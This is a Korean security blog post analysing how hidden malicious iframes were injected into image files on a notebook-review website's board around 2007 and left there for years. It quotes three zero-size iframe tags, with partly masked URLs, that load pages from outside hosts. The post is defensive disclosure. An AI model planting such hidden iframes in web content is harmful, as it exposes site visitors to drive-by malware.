국내 노트북 전문 웹진으로 유명한 노트○○ 사이트의 노트북 리뷰 게시판을 이용하던 중 보안 제품에서 진단하는 증상에 대한 제보가 들어와서 확인을 해보았습니다.

Trend Micro Titanium Maximum Security 2014 제품을 통해 확인을 해보면 특정 리뷰 게시글을 오픈하는 과정에서 다수의 그림 파일(JPG, GIF)을 HTML_IFRAME.AZ 진단명으로 진단하고 있습니다.

실제 진단되는 그림 파일의 위치를 확인해보면 공통적으로 노트북 리뷰에 작성된 그림 파일에 대해 일괄적으로 진단이 이루어지고 있는 것을 확인할 수 있었습니다.

연결 URL 정보를 살펴보면 리뷰 게시글에서 사용된 그림 파일 일체가 진단되고 있으며, 그림 파일 내부에는 맨 하단 영역에 다음과 같은 악성 iframe이 삽입되어 있는 것을 발견할 수 있습니다.

<iframe src=h**p://b2en.com/com/s.htm width=0 height=0></iframe>
<iframe src=h**p://www.66ki.cn/rong.htm width=100 height=0></iframe>
<iframe src=h**p://www.66ki.cn/rong.htm width=100 height=0></iframe>

도대체 해당 iframe이 언제 삽입되었는지 노트북 리뷰 게시글을 전체적으로 검토해본 결과 첫 번째 리뷰가 작성된 2002년 게시글부터 2007년 9월 29일 리뷰글까지 연결되어 있었으며, 이를 통해 2007년 9월 30일경에 리뷰 게시글에 첨부된 그림 파일에 악성 iframe이 삽입된 것으로 보입니다.

해당 업체에서는 이 문제에 대해 인지 여부는 알 수 없지만 그 후 6년이 넘는 기간 동안 아무런 조치없이 그대로 접속자에게 노출시키고 있으며, 이로 인하여 과거 작성된 리뷰글을 오픈하는 과정에서 백신 프로그램의 진단 문제가 발생하고 있습니다.

현재는 워낙 오래된 악성 URL 값으로 인해 시스템 감염으로 연결되지는 않겠지만, 해당 게시판 취약점 문제가 해결되지 않았다면 차후라도 유사한 공격으로 인해 악성코드 유포지로 악용될 소지가 있다고 판단됩니다.